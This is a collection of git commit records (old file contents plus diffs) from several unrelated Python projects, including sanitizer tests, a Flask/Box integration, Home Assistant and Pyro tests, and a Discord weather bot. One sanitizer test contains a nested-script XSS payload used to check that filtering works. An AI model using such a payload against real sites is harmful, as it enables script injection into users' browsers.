Add testcase for hr tag
|
tests/app/soc/logic/test_filtering.py
|
tests/app/soc/logic/test_filtering.py
|
#!/usr/bin/env python2.5
# -*- coding: UTF-8 -*-
#
# Copyright 2010 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__authors__ = [
'"Matthew Wilkes" <matthew@matthewwilkes.co.uk>',
]
import unittest
from htmlsanitizer import HtmlSanitizer
class FilteringTest(unittest.TestCase):
"""Tests to check HTML filtering works correctly.
"""
def test_newlines_preserved_unchanged_normally(self):
""" Test that newline is preserved in paragraphs. """
dirty = u'''<p>\r\n</p>'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_newlines_preserved_if_needed_to_be_wrapped(self):
""" Test that when wrapped in <p /> tags newlines are preserved
(albeit normalised)."""
dirty = u'''\n\n'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_newlines_wrapped_together_if_in_filtered_tags(self):
""" Test that when tags are filtered their contents is preserved (albeit
with normalised whitespace). """
dirty = u'''<div>\n</div><div>\n</div>'''
expected = u'''<p>\n</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_elements_that_compare_equal_arent_reordered(self):
""" Test that ordering is preserved with multiple identical tags.
If two elements have the same contents they compare equal. You can
abuse the insert method in beautiful soup to reorder tags, as if a
subelement is reinserted it will be moved to the position passed to
insert. Unfortunately, this gets confused if elements compare equal,
which results in only the first one being moved and all others left in
place. If all elements are 'moved' then this has the effect of the
other equal tags being left at the end of the stream.
"""
dirty = u'''<div>\n<h1>One</h1>\n<div>\n<h2>Repeat</h2>\n</div>\n</div>\n<div>\n<h1>Two</h1>\n<div>\n<h2>Repeat</h2>\n</div>\n</div>'''
expected = u'''\n<h1>One</h1>\n<h2>Repeat</h2>\n<h1>Two</h1>\n<h2>Repeat</h2>\n'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_break_tags_are_preserved(self):
""" Test that <br /> tags are preserved when wrapped. """
dirty = u'''Hello.<br />Goodbye.'''
expected = u'''<p>Hello.<br />Goodbye.</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
def test_no_extra_paragraphs_are_inserted(self):
"""Test that no extra paragraph tags are inserted"""
dirty = u'''<p>Bob</p>\n<p>Hello Bob</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(dirty, cleaner.string)
def test_xss_gets_filtered(self):
"""Test that the XSS as described in [0] gets filtered.
[0] http://stackoverflow.com/questions/699468/python-html-sanitizer-scrubber-filter/812785#812785
"""
from HTMLParser import HTMLParseError
dirty = u'''<<script>script> alert("Haha, I hacked your page."); </</script>script>'''
cleaner = HtmlSanitizer.Cleaner()
try:
cleaner.string = dirty
cleaner.clean()
self.fail("Invalid html should generate an error message.")
except HTMLParseError, msg:
pass
def test_anchor_tags_are_preserved(self):
"""Test that anchor tags are preserved"""
dirty = u'''<p><a name="there"></a></p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(dirty, cleaner.string)
def test_partial_quoted_tags_are_no_problem(self):
"""If some partial HTML is quoted it should be treated as text and not
subject to validation errors.
"""
dirty = u'''<p><a href="http://www.example.com"</p>'''
expected = u'''<p><a href="http://www.example.com"</p>'''
cleaner = HtmlSanitizer.Cleaner()
cleaner.string = dirty
cleaner.clean()
self.assertEqual(cleaner.string, expected)
|
Python
| 0
|
@@ -4761,28 +4761,271 @@
l(cleaner.string, expected)%0A
+%0A def test_hr_tags_are_preserved(self):%0A %22%22%22Test that hr tags are preserved%22%22%22%0A dirty = u'''%3Cp%3E%3Chr%3E%3C/p%3E'''%0A cleaner = HtmlSanitizer.Cleaner()%0A cleaner.string = dirty%0A cleaner.clean()%0A self.assertEqual(dirty, cleaner.string)%0A
|
aef9672ac63800c1f63cf721da9b89bfaa1e87b8
|
Change default sort order
|
colourlens/views.py
|
colourlens/views.py
|
from django.db.models import Avg, Sum, Count
from django import forms
from django.forms.widgets import Input
from django.http import HttpResponse
from django.template import RequestContext, loader
from django.views.decorators.cache import cache_page
from colourlens.models import Artwork, Colour
PROM_ATTRS = {'min': '0', 'max': '100', 'step': '5'}
DIST_ATTRS = {'min': '0', 'max': '50', 'step': '1'}
class RangeInput(Input):
input_type = "range"
class ColourForm(forms.Form):
def __init__(self, *args, **kwargs):
"""
Add classes to denote type of input
"""
super(ColourForm, self).__init__(*args, **kwargs)
for k, v in self.fields.iteritems():
if v.widget.__class__ == forms.CheckboxInput:
v.widget.attrs['class'] = 'colourbox'
elif v.widget.__class__ == RangeInput:
v.widget.attrs['class'] = 'slider'
black = forms.BooleanField(required=False)
grey = forms.BooleanField(required=False)
silver = forms.BooleanField(required=False)
white = forms.BooleanField(required=False)
red = forms.BooleanField(required=False)
maroon = forms.BooleanField(required=False)
brown = forms.BooleanField(required=False)
orange = forms.BooleanField(required=False)
yellow = forms.BooleanField(required=False)
lime = forms.BooleanField(required=False)
green = forms.BooleanField(required=False)
olive = forms.BooleanField(required=False)
cyan = forms.BooleanField(required=False)
teal = forms.BooleanField(required=False)
blue = forms.BooleanField(required=False)
navy = forms.BooleanField(required=False)
magenta = forms.BooleanField(required=False)
purple = forms.BooleanField(required=False)
prominence = forms.IntegerField(label="Increase colour area",
widget=RangeInput(attrs=PROM_ATTRS))
distance = forms.IntegerField(label="Broaden palette",
widget=RangeInput(attrs=DIST_ATTRS))
submitted = forms.CharField(widget=forms.HiddenInput())
@cache_page(60 * 60)
def index(request, institution=False):
"""
Search and browse colours
"""
DISTANCE = 20
artworks = Artwork.objects.select_related().all()
colours = Colour.objects.all()
req_colours = request.GET.getlist('colour', [])
startyear = request.GET.get('startyear', None)
endyear = request.GET.get('endyear', None)
colour_filters = {}
if startyear:
artworks = artworks.filter(year__gte=startyear)
colour_filters['artwork__year__gte'] = startyear
if endyear:
artworks = artworks.filter(year__lte=endyear)
colour_filters['artwork__year__lte'] = endyear
for hex_value in req_colours:
artworks = artworks.filter(
colours__hex_value=hex_value,
colourdistance__distance__lte=DISTANCE,
)
if institution:
artworks = artworks.filter(institution=institution)
colour_filters['artwork__institution'] = institution
artworks = artworks.annotate(
ave_distance=Avg("colourdistance__distance"),
ave_presence=Avg("colourdistance__presence"),
tot_presence=Sum("colourdistance__presence")
)
artworks = artworks.order_by('-tot_presence').distinct()
if req_colours:
colour_filters['artwork__id__in'] = [a.id for a in artworks[:990]]
colour_filters['colourdistance__distance__lte'] = DISTANCE
found_works = artworks.count()
colours = colours.filter(**colour_filters)
colours = colours.annotate(Count('artwork', distinct=True)).order_by('hue')
total_palette = reduce(
lambda x, y: x+y,
[c.artwork__count for c in colours]
)
colour_count = colours.count()
colour_width = 99.4 / colour_count
institutions = Artwork.objects.all().values('institution').distinct()
t = loader.get_template("colour.html")
context_data = {
'artworks': artworks[:40],
'colours': colours,
'colour_count': colour_count,
'colour_width': colour_width,
'total_palette': total_palette,
'found': found_works,
'institution': institution,
'institutions': institutions,
'req_colours': req_colours,
}
c = RequestContext(request, context_data)
return HttpResponse(t.render(c))
|
Python
| 0.000001
|
@@ -3084,24 +3084,26 @@
ate(%0A
+ #
ave_distanc
@@ -3144,16 +3144,74 @@
%0A
+ # tot_distance=Avg(%22colourdistance__distance%22),%0A #
ave_pre
@@ -3256,16 +3256,18 @@
%0A
+ #
tot_pre
@@ -3303,16 +3303,132 @@
esence%22)
+,%0A tot_prominence=Sum(%22colourdistance__prominence%22),%0A ave_prominence=Avg(%22colourdistance__prominence%22)
%0A )%0A%0A
@@ -3464,26 +3464,28 @@
_by('-tot_pr
-es
+omin
ence').disti
|
f61a4766ad3006bb2001df33d06feeb15352aa5a
|
Change Box user list request from raw API call to Box SDK make_request method
|
okta-integration/python/server.py
|
okta-integration/python/server.py
|
from flask import Flask, redirect, g, url_for
from flask_oidc import OpenIDConnect
from okta import UsersClient
from boxsdk import Client
from boxsdk import JWTAuth
import requests
import config
import json
app = Flask(__name__)
app.config.update({
'SECRET_KEY': config.okta_client_secret,
'OIDC_CLIENT_SECRETS': './client_secrets.json',
'OIDC_DEBUG': True,
'OIDC_ID_TOKEN_COOKIE_SECURE': False,
'OIDC_SCOPES': ["openid", "profile"],
'OIDC_CALLBACK_ROUTE': config.okta_callback_route
})
oidc = OpenIDConnect(app)
okta_client = UsersClient(config.okta_org_url, config.okta_auth_token)
# Fetch Okta user record if logged in
@app.before_request
def before_request():
if oidc.user_loggedin:
g.user = okta_client.get_user(oidc.user_getfield('sub'))
else:
g.user = None
# Main application route
@app.route('/')
def start():
return redirect(url_for(".box_auth"))
# Box user verification
@app.route("/box_auth")
@oidc.require_login
def box_auth():
uid = g.user.id
auth = JWTAuth.from_settings_file('../config.json')
access_token = auth.authenticate_instance()
box_client = Client(auth)
# Validate is user exists
url = f'https://api.box.com/2.0/users?external_app_user_id={uid}'
headers = {'Authorization': 'Bearer ' + access_token}
response = requests.get(url, headers=headers)
user_info = response.json()
# If user not found, create user, otherwise fetch user token
if (user_info['total_count'] == 0):
user_name = f'{g.user.profile.firstName} {g.user.profile.lastName}'
space = 1073741824
# Create app user
user = box_client.create_user(user_name, None, space_amount=space, external_app_user_id=uid)
print('user {name} created')
else:
# Create user client based on discovered user
user = user_info['entries'][0]
user_to_impersonate = box_client.user(user_id=user['id'])
user_client = box_client.as_user(user_to_impersonate)
# Get current user
current_user = box_client.user().get()
print(current_user.id)
# Get all items in a folder
items = user_client.folder(folder_id='0').get_items()
for item in items:
print('{0} {1} is named "{2}"'.format(item.type.capitalize(), item.id, item.name))
return 'Test complete'
# User logout
@app.route("/logout")
def logout():
oidc.logout()
|
Python
| 0
|
@@ -983,16 +983,52 @@
ser.id%0A%0A
+ # Instantiate Box Client instance%0A
auth =
@@ -1077,54 +1077,8 @@
n')%0A
- access_token = auth.authenticate_instance()%0A
bo
@@ -1204,108 +1204,53 @@
'%0A
-headers = %7B'Authorization': 'Bearer ' + access_token%7D%0A response = requests.get(url, headers=headers
+response = box_client.make_request('GET', url
)%0A
@@ -2138,16 +2138,18 @@
name))%0A%0A
+
return
@@ -2165,16 +2165,18 @@
mplete'%0A
+
%0A# User
@@ -2233,9 +2233,8 @@
logout()
-%0A
|
332cbbd8b1be773593037d293c5dabbf6c100199
|
Migrate freedns tests from coroutine to async/await (#30390)
|
tests/components/freedns/test_init.py
|
tests/components/freedns/test_init.py
|
"""Test the FreeDNS component."""
import asyncio
import pytest
from homeassistant.components import freedns
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from tests.common import async_fire_time_changed
ACCESS_TOKEN = "test_token"
UPDATE_INTERVAL = freedns.DEFAULT_INTERVAL
UPDATE_URL = freedns.UPDATE_URL
@pytest.fixture
def setup_freedns(hass, aioclient_mock):
"""Fixture that sets up FreeDNS."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="Successfully updated 1 domains."
)
hass.loop.run_until_complete(
async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
)
@asyncio.coroutine
def test_setup(hass, aioclient_mock):
"""Test setup works if update passes."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="ERROR: Address has not changed."
)
result = yield from async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert result
assert aioclient_mock.call_count == 1
async_fire_time_changed(hass, utcnow() + UPDATE_INTERVAL)
yield from hass.async_block_till_done()
assert aioclient_mock.call_count == 2
@asyncio.coroutine
def test_setup_fails_if_wrong_token(hass, aioclient_mock):
"""Test setup fails if first update fails through wrong token."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(UPDATE_URL, params=params, text="ERROR: Invalid update URL (2)")
result = yield from async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert not result
assert aioclient_mock.call_count == 1
|
Python
| 0
|
@@ -31,24 +31,8 @@
%22%22%22%0A
-import asyncio%0A%0A
impo
@@ -900,35 +900,22 @@
)%0A%0A%0A
-@
async
-io.coroutine%0A
+
def test
@@ -1149,34 +1149,29 @@
result =
-yield from
+await
async_setup
@@ -1514,26 +1514,21 @@
AL)%0A
-yield from
+await
hass.as
@@ -1597,27 +1597,14 @@
2%0A%0A%0A
-@
async
-io.coroutine%0A
+
def
@@ -1880,18 +1880,13 @@
t =
-yield from
+await
asy
|
0c5ab1d1b09dd77cd2052f9f4cbad3c7bbf5b8ef
|
Fix failing von mises tests on CUDA (#1747)
|
tests/distributions/test_von_mises.py
|
tests/distributions/test_von_mises.py
|
from __future__ import absolute_import, division, print_function
import math
import pytest
import torch
from torch import optim
from pyro.distributions import VonMises, VonMises3D
from pyro.distributions.von_mises import _log_modified_bessel_fn
def _fit_params_from_samples(samples, n_iter):
assert samples.dim() == 1
samples_count = samples.size(0)
samples_cs = samples.cos().sum()
samples_ss = samples.sin().sum()
mu = torch.atan2(samples_ss / samples_count, samples_cs / samples_count)
samples_r = (samples_cs ** 2 + samples_ss ** 2).sqrt() / samples_count
# From Banerjee, Arindam, et al.
# "Clustering on the unit hypersphere using von Mises-Fisher distributions."
# Journal of Machine Learning Research 6.Sep (2005): 1345-1382.
# By mic (https://stats.stackexchange.com/users/67168/mic),
# Estimating kappa of von Mises distribution, URL (version: 2015-06-12):
# https://stats.stackexchange.com/q/156692
kappa = (samples_r * 2 - samples_r ** 3) / (1 - samples_r ** 2)
lr = 1e-2
kappa.requires_grad = True
bfgs = optim.LBFGS([kappa], lr=lr)
def bfgs_closure():
bfgs.zero_grad()
obj = (_log_modified_bessel_fn(kappa, order=1)
- _log_modified_bessel_fn(kappa, order=0))
obj = (obj - samples_r.log()).abs()
obj.backward()
return obj
for i in range(n_iter):
bfgs.step(bfgs_closure)
return mu, kappa.detach()
@pytest.mark.parametrize('loc', [-math.pi/2.0, 0.0, math.pi/2.0])
@pytest.mark.parametrize('concentration', [0.01, 0.03, 0.1, 0.3, 1.0, 3.0, 10.0, 30.0, 100.0])
def test_sample(loc, concentration, n_samples=int(1e6), n_iter=100):
prob = VonMises(loc, concentration)
samples = prob.sample((n_samples,))
mu, kappa = _fit_params_from_samples(samples, n_iter=n_iter)
assert abs(loc - mu) < 0.1
assert abs(concentration - kappa) < concentration * 0.1
@pytest.mark.parametrize('concentration', [0.01, 0.03, 0.1, 0.3, 1.0, 3.0, 10.0, 30.0, 100.0])
def test_log_prob_normalized(concentration):
grid = torch.arange(0., 2 * math.pi, 1e-4)
prob = VonMises(0.0, concentration).log_prob(grid).exp()
norm = prob.mean().item() * 2 * math.pi
assert abs(norm - 1) < 1e-3, norm
@pytest.mark.parametrize('scale', [0.1, 0.5, 0.9, 1.0, 1.1, 2.0, 10.0])
def test_von_mises_3d(scale):
concentration = torch.randn(3)
concentration = concentration * (scale / concentration.norm(2))
num_samples = 100000
samples = torch.randn(num_samples, 3)
samples = samples / samples.norm(2, dim=-1, keepdim=True)
d = VonMises3D(concentration, validate_args=True)
actual_total = d.log_prob(samples).exp().mean()
expected_total = 1 / (4 * math.pi)
ratio = actual_total / expected_total
assert torch.abs(ratio - 1) < 0.01, ratio
|
Python
| 0
|
@@ -70,16 +70,26 @@
ort math
+%0Aimport os
%0A%0Aimport
@@ -251,16 +251,54 @@
ssel_fn%0A
+from tests.common import skipif_param%0A
%0A%0Adef _f
@@ -1599,37 +1599,212 @@
oncentration', %5B
-0.01,
+skipif_param(0.01, condition='CUDA_TEST' in os.environ,%0A reason='low precision.'),%0A
0.03, 0.1, 0.3,
@@ -1897,18 +1897,17 @@
n_iter=
-10
+5
0):%0A
|
70f198f6148f5edbef0af77d6959171265abc248
|
remove uvindex
|
commands/weather.py
|
commands/weather.py
|
#import forecastiopy
import geocoder
import json
import discord
import datetime
from forecastiopy import *
from darksky import forecast
from discord.ext import commands
from utils.sharding import darkskyapi
api_key = darkskyapi
class Weather():
def __init__(self, bot):
self.bot = bot
@commands.command()
async def weather(self, ctx, *, address: str):
"""Dark Sky Weather Results"""
if ctx.message.author == ctx.message.author: #filler
try:
g = geocoder.google(address)
results = g.latlng
loc = g.address
#if any(sin in address for sin in the_sin):
# theresult = True
#else:
# theresult = False
if ", USA" in loc:
thedisplay = True
thevariable = True
elif ", USA" not in loc:
thedisplay = False
thevariable = False
if ", UK" in loc:
print("Passing as United Kingdom")
fio = ForecastIO.ForecastIO(api_key, latitude=results[0], longitude=results[1], units=ForecastIO.ForecastIO.UNITS_UK)
if ", Canada" in loc:
print("Passing as Canada")
fio = ForecastIO.ForecastIO(api_key, latitude=results[0], longitude=results[1], units=ForecastIO.ForecastIO.UNITS_CA)
else:
print("Passing with an automatic unit")
fio = ForecastIO.ForecastIO(api_key, latitude=results[0], longitude=results[1])
current = FIOCurrently.FIOCurrently(fio)
ds = forecast(api_key, int(results[0]), int(results[1]))
if thedisplay == True:
print("The display passed")
em = discord.Embed(description="This information is displayed in Farenheit.")
elif thedisplay == False:
print("The display didn't pass")
em = discord.Embed(description="This information is displayed in Celcius.")
em.title = "{}'s Current Weather".format(loc)
if current.uvIndex == 0:
uvresult = "There probably isn't any sun right now."
uvint = "0"
elif current.uvIndex == range(1, 5):
uvresult = "Few sun rays are hitting."
uvint = current.uvIndex
elif current.uvIndex == range(5, 8):
uvresult = "Hm.. The sun might be a bit stronk. Wear sunscreen if you're going out."
uvint = current.uvIndex
elif current.uvIndex == range(8, 15):
uvresult = "Damn, the sun rays are hitting good here! Wear sunscreen definitely!"
uvint = current.uvIndex
else:
uvresult = "Not available."
uvint = "N/A"
try:
visib = current.visibility
except AttributeError:
visib = "N/A"
if ctx.me.color == None:
maybe = None
else:
maybe = ctx.me.color
try:
expiretime = datetime.datetime.fromtimestamp(int(ds.alerts[0].expires)).strftime('%A %B %d, %Y %I:%M %Z')
print("expire time passed")
counties = ', '.join(ds.alerts[0].regions)
print("joining counties passed")
alertresult = "{} in {}, expiring at {}. More info [at NWS]({} 'National Weather Service')".format(ds.alerts[0].title, counties, expiretime, ds.alerts[0].uri)
print("alert setup complete")
except Exception as e:
alertresult = e
em.set_thumbnail(url="https://dragonfire.me/474be77b-23bc-42e4-a779-6eb7b3b9a892.jpg")
em.color = maybe
if thevariable == True:
print("The variable passed")
em.add_field(name='Temperature', value="{}°F".format(current.temperature), inline=True)
elif thevariable == False:
print("The variable didn't pass")
em.add_field(name='Temperature', value="{}°C".format(current.temperature), inline=True)
em.add_field(name='Currently', value="{}".format(current.summary), inline=True)
em.add_field(name='Humidity', value="{:.0%}".format(current.humidity), inline=True)
#this is a bit tricky when it comes to some countries so i'll leave it as is
if ", UK" in loc:
print("speeds as UK")
em.add_field(name='Wind Speed/Gust (imperial)', value="{} mph/{} mph".format(current.windSpeed, current.windGust), inline=True)
if ", USA" in loc:
print("speeds as America")
em.add_field(name='Wind Speed/Wind Gust', value="{} mph/{} mph".format(current.windSpeed, current.windGust), inline=True)
else:
print("speeds in Metric (automatic)")
em.add_field(name='Wind Speed/Gust', value="{} km/h/{} km/h".format(current.windSpeed, current.windGust), inline=True)
#same for this
if ", UK" in loc:
print("visibilty as UK")
em.add_field(name='Visibility (imperial)', value="{} miles".format(visib), inline=True)
if ", USA" in loc:
print("visibility as America")
em.add_field(name='Visibility', value="{} miles".format(visib), inline=True)
else:
print("visibility in Metric (automatic)")
em.add_field(name='Visibility', value="{} kilometers".format(visib), inline=True)
em.add_field(name='UV Index', value="{} Current index is **{}**.".format(uvresult, uvint), inline=True)
if fio.has_alerts() is True:
em.add_field(name='Weather Alert', value=alertresult, inline=True)
await ctx.send(embed=em)
except Exception as fucking_hell:
await ctx.send("```py\n{}\n```".format(fucking_hell))
else:
await ctx.send("Location isn't found or the given zip code or address is too short. Try again.")
@commands.command()
async def locate(self, ctx, *, address: str):
"""Go fucking stalk someone"""
try:
g = geocoder.google(address)
loc = g.json
var = json.dumps(loc)
k = json.loads(var)
if k['status'] == 'OK':
yes = k['address']
elif k['status'] == 'ZERO_RESULTS':
yes = "There's no results found for this location."
await ctx.send(yes)
except Exception as e:
await ctx.send("```py\n{}\n```".format(e))
def setup(bot):
bot.add_cog(Weather(bot))
|
Python
| 0.997691
|
@@ -2194,816 +2194,8 @@
oc)%0A
- if current.uvIndex == 0:%0A uvresult = %22There probably isn't any sun right now.%22%0A uvint = %220%22%0A elif current.uvIndex == range(1, 5):%0A uvresult = %22Few sun rays are hitting.%22%0A uvint = current.uvIndex%0A elif current.uvIndex == range(5, 8):%0A uvresult = %22Hm.. The sun might be a bit stronk. Wear sunscreen if you're going out.%22%0A uvint = current.uvIndex%0A elif current.uvIndex == range(8, 15):%0A uvresult = %22Damn, the sun rays are hitting good here! Wear sunscreen definitely!%22%0A uvint = current.uvIndex%0A else:%0A uvresult = %22Not available.%22%0A uvint = %22N/A%22%0A
@@ -5168,128 +5168,8 @@
ue)%0A
- em.add_field(name='UV Index', value=%22%7B%7D Current index is **%7B%7D**.%22.format(uvresult, uvint), inline=True)%0A
|
72941398fd2e78cbf5d994b4bf8683c4bdefaab9
|
Comment out semipar notebook in travis runner until pip build us updated.
|
utils/travis_runner.py
|
utils/travis_runner.py
|
#!/usr/bin/env python
"""This script manages all tasks for the TRAVIS build server."""
import os
import subprocess
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"grmpy_tutorial_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
os.chdir("../..")
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"tutorial_semipar_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
|
Python
| 0
|
@@ -405,16 +405,18 @@
/..%22)%0A%0A%0A
+#
if __nam
@@ -426,32 +426,34 @@
== %22__main__%22:%0A
+#
os.chdir(%22pr
@@ -482,36 +482,38 @@
_notebook%22)%0A
+#
+
cmd = %5B%0A
%22jup
@@ -492,32 +492,34 @@
)%0A# cmd = %5B%0A
+#
%22jupyter
@@ -513,32 +513,34 @@
%22jupyter%22,%0A
+#
%22nbconve
@@ -536,32 +536,34 @@
%22nbconvert%22,%0A
+#
%22--execu
@@ -559,32 +559,34 @@
%22--execute%22,%0A
+#
%22tutoria
@@ -608,32 +608,33 @@
ook.ipynb%22,%0A
+#
%22--ExecutePr
@@ -613,32 +613,33 @@
pynb%22,%0A#
+
%22--ExecutePrepro
@@ -650,38 +650,42 @@
or.timeout=-1%22,%0A
+#
%5D%0A
+#
subprocess.c
|
1f2c175d00729902a953513436879b08a0e3baa3
|
test must have broken with upgrade (change in random seed?) so this fixes it
|
tests/mep/genetics/test_chromosome.py
|
tests/mep/genetics/test_chromosome.py
|
import unittest
import random
from mep.genetics.gene import VariableGene, OperatorGene, Gene
from mep.genetics.chromosome import Chromosome
import numpy as np
class MockedGene(Gene):
def __init__(self, error_to_return):
"""
Initialize.
:param error_to_return: what to return in the evaluate
:type error_to_return: float
"""
self.error_to_return = error_to_return
def evaluate(self, gene_index, eval_matrix, data_matrix, constants, targets):
"""
Simple mocked version.
"""
return self.error_to_return
class TestChromosome(unittest.TestCase):
"""
Tests for the chromosome.
"""
def test_basic_random_construction(self):
"""
Basic example of a construction.
"""
# set the seed to keep it reproducible
random.seed(0)
# create the chromosome
num_genes = 2
num_constants = 1
chromosome = Chromosome.generate_random_chromosome(num_constants=num_constants, constants_min=1,
constants_max=10, constants_prob=0.2,
feature_variable_prob=0.3,
num_feature_variables=2, num_genes=num_genes,
operators_prob=0.5)
# confirm the number of genes and constants match what we expect
self.assertEquals(num_genes, len(chromosome.genes))
self.assertEquals(num_constants, len(chromosome.constants))
# the first gene has to be a variable gene; in particular it is this one
self.assertEquals(VariableGene(0, is_feature=False), chromosome.genes[0])
# the 2nd gene can be a variable or an operator; in this case it is the below
self.assertEquals(OperatorGene(Chromosome.operators_family[2](), 0, 0), chromosome.genes[1])
# verify constant
self.assertAlmostEquals(8.599796663725433, chromosome.constants[0])
def test_evaluate(self):
"""
Basic test of the evaluate method.
"""
# construct mocked genes
genes = [MockedGene(10), MockedGene(1)]
# construct chromosome
chromosome = Chromosome(genes, constants=[1, 2, 3])
# evaluate
chromosome.evaluate(np.zeros((2, 2)), targets=[20, 30])
# confirm the genes
self.assertEqual(genes[1], genes[chromosome.best_gene_index])
self.assertEqual(genes[1].error_to_return, chromosome.error)
def test_sort(self):
"""
Test the sort mechanism.
"""
# construct the chromosomes and test sorting them (by error)
min_chromosome, mid_chromosome, max_chromosome = Chromosome([], []), Chromosome([], []), Chromosome([], [])
min_chromosome.error = 1
mid_chromosome.error = 2
max_chromosome.error = 3
chromosomes = [mid_chromosome, max_chromosome, min_chromosome]
expected_chromosomes = [min_chromosome, mid_chromosome, max_chromosome]
# do the sort and verify
chromosomes.sort()
self.assertEqual(expected_chromosomes, chromosomes)
|
Python
| 0
|
@@ -1502,25 +1502,24 @@
.assertEqual
-s
(num_genes,
@@ -1565,17 +1565,16 @@
ertEqual
-s
(num_con
@@ -1714,17 +1714,16 @@
ertEqual
-s
(Variabl
@@ -1882,17 +1882,16 @@
ertEqual
-s
(Operato
@@ -1924,17 +1924,17 @@
_family%5B
-2
+4
%5D(), 0,
@@ -2015,17 +2015,16 @@
ostEqual
-s
(8.59979
|
17dfc3faa45584200c8f67686b86b541a2ce01fe
|
Test for informal word
|
revscoring/languages/tests/test_hebrew.py
|
revscoring/languages/tests/test_hebrew.py
|
from nose.tools import eq_
from .. import language, hebrew
def test_language():
is_misspelled = hebrew.solve(language.is_misspelled)
assert is_misspelled("חטול")
assert not is_misspelled("חתול")
is_badword = hebrew.solve(language.is_badword)
assert is_badword("שרמוטה")
assert not is_badword("שימרותה")
|
Python
| 0.000037
|
@@ -323,12 +323,154 @@
(%22%D7%A9%D7%99%D7%9E%D7%A8%D7%95%D7%AA%D7%94%22)%0A
+%0A is_informal_word = hebrew.solve(language.is_informal_word)%0A%0A assert is_informal_word(%22%D7%91%D7%92%D7%9C%D7%9C%D7%9A%22)%0A assert not is_informal_word(%22%D7%91%D7%92%D7%9C%D7%9C%22)%0A
|
1b75a0e5ee01387c434922b9d0fd23705cbafe9b
|
Allow empty enums for `OneOf`
|
marshmallow_jsonschema/validation.py
|
marshmallow_jsonschema/validation.py
|
from marshmallow import fields
from .exceptions import UnsupportedValueError
def handle_length(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Length``, setting the
values appropriately for ``fields.List``, ``fields.Nested``, and
``fields.String``.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
Raises:
UnsupportedValueError: Raised if the `field` is something other than
`fields.List`, `fields.Nested`, or `fields.String`
"""
if isinstance(field, fields.String):
minKey = "minLength"
maxKey = "maxLength"
elif isinstance(field, (fields.List, fields.Nested)):
minKey = "minItems"
maxKey = "maxItems"
else:
raise UnsupportedValueError(
"In order to set the Length validator for JSON "
"schema, the field must be either a List, Nested or a String"
)
if validator.min:
schema[minKey] = validator.min
if validator.max:
schema[maxKey] = validator.max
if validator.equal:
schema[minKey] = validator.equal
schema[maxKey] = validator.equal
return schema
def handle_one_of(schema, field, validator, parent_schema):
"""Adds the validation logic for ``marshmallow.validate.OneOf`` by setting
the JSONSchema `enum` property to the allowed choices in the validator.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.OneOf): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
"""
if validator.choices:
schema["enum"] = list(validator.choices)
schema["enumNames"] = list(validator.labels)
return schema
def handle_range(schema, field, validator, parent_schema):
"""Adds validation logic for ``marshmallow.validate.Range``, setting the
values appropriately ``fields.Number`` and it's subclasses.
Args:
schema (dict): The original JSON schema we generated. This is what we
want to post-process.
field (fields.Field): The field that generated the original schema and
who this post-processor belongs to.
validator (marshmallow.validate.Length): The validator attached to the
passed in field.
parent_schema (marshmallow.Schema): The Schema instance that the field
belongs to.
Returns:
dict: A, possibly, new JSON Schema that has been post processed and
altered.
"""
if not isinstance(field, fields.Number):
return schema
if validator.min:
schema["minimum"] = validator.min
if validator.max:
schema["maximum"] = validator.max
return schema
|
Python
| 0.000011
|
@@ -2392,38 +2392,25 @@
dict:
-A, possibly, n
+N
ew JSON Sche
@@ -2478,38 +2478,8 @@
%22%22%22%0A
